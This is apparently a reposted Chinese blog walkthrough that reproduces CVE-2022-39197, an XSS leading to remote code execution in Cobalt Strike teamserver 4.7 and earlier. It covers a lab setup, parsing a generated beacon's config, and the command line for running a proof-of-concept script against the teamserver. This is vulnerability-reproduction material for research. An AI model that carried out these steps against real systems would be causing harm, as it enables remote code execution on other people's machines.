漏洞说明

根据9.20日CobaltStrike官方发布的最新4.7.1版本的更新日志中介绍，<=4.7的teamserver版本存在XSS漏洞，从而可以造成RCE远程代码执行

一位名为“Beichendream”的独立研究人员联系我们，告知我们他们在团队服务器中发现的一个 XSS 漏洞。这将允许攻击者在 Beacon 配置中设置格式错误的用户名，从而允许他们远程执行代码RCE。

---

复现过程

根据漏洞原理，类似之前使用的cs上线器，稍微修改一下上线的payload即可。

测试环境

服务端：Ubuntu20.04+JDK11+CS4.3 (IP: 172.16.12.13)

客户端：M2 macOS Monterey 12.5 + JDK17 (IP: 172.16.12.2)

用到的工具：CobaltStrikeParser、CVE-2022-39197 POC

---

环境搭建

# ubuntu
chmod +x teamserver
./teamserver 172.16.12.13 haha123
# macOS--提供图片加载服务,如果联网的话可以省略该步,使用任意在线图片的url
brew install node@14
npm i --global serve
serve		# 用serve在图片路径下开启服务, 此处图片文件url为：http://172.16.12.2:3000/logo.png

CS中创建一个listener监听器

然后生成一个package木马，经测试，是否勾选x64（即生成的32位和64位均可上线）不影响结果

---

POC使用

首先对这个生成的beacon进行分析，我们这里使用CobaltStrikeParser这个工具。

python3 parse_beacon_config.py beacon4.3_x64.exe --json

重点关注如下几个点

将Port、C2Server、HttpPostUri进行拼接，这里变成：http://172.16.12.13:8080/visit.js/submit.php，记录下来

将PublicKey复制到一个txt文件中，注意去除前后的空格

使用我写的POC（编写不易，麻烦加个star吧，后期会把上述分析功能集成，一站式实现）

python3 cve-2022-39197-poc.py -i http://172.16.12.2:3000/logo.png -u http://172.16.12.13:8080/visit.js/submit.php -k key.txt

---

转载于：https://blog.csdn.net/qq_35664104/article/details/127018606?spm=1001.2100.3001.7377&utm_medium=distribute.pc_feed_blog_category.none-task-blog-classify_tag-15-127018606-null-null.nonecase&depth_1-utm_source=distribute.pc_feed_blog_category.none-task-blog-classify_tag-15-127018606-null-null.nonecase